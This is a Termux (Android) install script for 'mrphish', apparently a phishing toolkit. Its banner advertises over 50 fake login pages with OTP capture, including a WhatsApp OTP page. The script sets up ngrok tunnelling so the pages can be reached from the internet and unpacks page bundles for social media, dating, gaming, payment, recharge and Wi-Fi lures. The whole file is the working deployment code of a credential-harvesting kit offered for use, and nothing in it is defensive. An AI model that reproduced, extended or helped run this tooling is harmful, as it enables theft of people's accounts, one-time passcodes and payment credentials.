#basic packages install
#only one time install request pkgs
#make sure you have internet with speed
clear
echo -e "\e[96m      |-----------------------[V 1.3]-----------------------|"
echo -e "\e[96m      |----------------------\e[92mUPDATE V1.3\e[96m--------------------|"
echo -e "\e[96m      |-----------------------------------------------------|"
echo -e "\e[96m      |                                                     |"
echo -e "\e[96m      |            > 50+ latest pages with otp options      |"
echo -e "\e[96m      |            > Ngrok link status on screen            |"
echo -e "\e[96m      |            > Ngrok link issue fixed                 |"
echo -e "\e[96m      |            > New ChatNow button added               |"
echo -e "\e[96m      |            > New update modules with bux fixes      |"
echo -e "\e[96m      |            > New Patch update module                |"
echo -e "\e[96m      |            > Whats app otp page fixed               |"
echo -e "\e[96m      |                                                     |"
echo -e "\e[96m      |-----------------------------------------------------|"
echo -e "\e[96m      |-----------------------\e[91mFEATURES\e[96m----------------------|"
echo -e "\e[96m      |-----------------------------------------------------|"
sleep 13.0
clear
echo -e "\e[96m      |------------[ INSTALLATION STARTED ]-----------------|"
echo -e "\e[96m      |-------[KEEP YOUR DEVICE AWAY FOR WHILE]-------------|"
sleep 8.0
apt-get update 
apt-get upgrade
echo " "
echo " "
echo -e "\e[92m      |------[SELECT OPTION (Y) to go forward]---------|"
echo " "
termux-setup-storage
pkg install git -y > /dev/null 2>&1
pkg install zip -y > /dev/null 2>&1
pkg install mpv -y > /dev/null 2>&1
pkg install wget -y > /dev/null 2>&1
pkg install openssh -y > /dev/null 2>&1
pkg install python -y > /dev/null 2>&1
pkg install python2 -y > /dev/null 2>&1
pkg install nano -y > /dev/null 2>&1
pkg install php -y > /dev/null 2>&1
pip install lolcat 
cd /sdcard > /dev/null 2>&1
mkdir dUmpS > /dev/null 2>&1
cd $HOME/mrphish > /dev/null 2>&1
mv log.mp3 /sdcard > /dev/null 2>&1
cd $HOME/mrphish/core > /dev/null 2>&1
chmod +x ngrok > /dev/null 2>&1
mv ngrok $HOME > /dev/null 2>&1
cd $HOME > /dev/null 2>&1
clear
echo -e '\e[96m          [\e[92mNGROK SETUP\e[96m]--------------'
echo -e '\e[96m                           |'
echo -e '\e[92m    NGROK IS NOT WORKING WITH WIFI USERS BUT DONT WORRY'
echo -e '\e[92m    JUST PASTE AUTH CODE BY WATCHING VIDEO THEN YOU CAN'
echo -e '\e[92m        USE NGROK WITHOUT ANY ISSUE, GET LINK BELOW'
echo
echo -e '\e[92m      VIDEO LINK :- [ will update in next update ]'
echo
echo -e '\e[96m   EXAMPLE AUTH CODE - ./ngrok authtoken KavOb3e638hhs9 '
echo -e '\e[96m                           |'
echo -e '\e[96m                   JUST PASTE THIS PART'
echo -e '\e[96m  (dont copy paste this dummy one)- KavOb3e638hhs973ijsiwu'
echo -e '\e[96m                           |'
echo -e '\e[96m                           |'
sleep 8.0
clear
am start -a android.intent.action.VIEW -d https://www.ngrok.com
clear
read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] NGROK AUTH CODE : \e[0m' name
./ngrok authtoken $name
clear 
mv ngrok $HOME/mrphish/core > /dev/null 2>&1
cd $HOME/mrphish > /dev/null 2>&1
cd core/deploys > /dev/null 2>&1
unzip dating.zip > /dev/null 2>&1
unzip gaming.zip > /dev/null 2>&1
unzip others.zip > /dev/null 2>&1
unzip others1.zip > /dev/null 2>&1
unzip socialmedia.zip > /dev/null 2>&1
unzip socialmedia1.zip > /dev/null 2>&1
unzip socialmedia2.zip > /dev/null 2>&1
unzip socialmedia3.zip > /dev/null 2>&1
unzip socialmedia4.zip > /dev/null 2>&1
unzip socialmedia5.zip > /dev/null 2>&1
unzip socialmedia6.zip > /dev/null 2>&1
unzip socialmedia7.zip > /dev/null 2>&1
unzip socialmedia8.zip > /dev/null 2>&1
unzip socialmedia9.zip > /dev/null 2>&1
unzip socialmedia10.zip > /dev/null 2>&1
unzip socialmedia11.zip > /dev/null 2>&1
unzip socialmedia12.zip > /dev/null 2>&1
unzip payment.zip > /dev/null 2>&1
unzip recharge.zip > /dev/null 2>&1                                                                      
unzip wifirt.zip > /dev/null 2>&1                                                                    
cd socialmedia1 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia1 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia2 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia2 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia3 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia3 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia4 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia4 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia5 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia5 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia6 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia6 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia7 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia7 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia8 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia8 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia9 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia9 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia10 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia10 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia11 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia11 > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
cd socialmedia12 > /dev/null 2>&1
mv * $HOME/mrphish/core/deploys/socialmedia > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf socialmedia12 > /dev/null 2>&1
cd others1 > /dev/null 2>&1
mv  * $HOME/mrphish/core/deploys/others > /dev/null 2>&1
cd $HOME/mrphish/core/deploys > /dev/null 2>&1
rm -rf others1 > /dev/null 2>&1
rm *.zip > /dev/null 2>&1
cd $HOME/mrphish > /dev/null 2>&1
mpv /sdcard/log.mp3
rm setup > /dev/null 2>&1
cd $HOME/mrphish
rm update.v1.3
cd $HOME/mrphish
bash mrphish
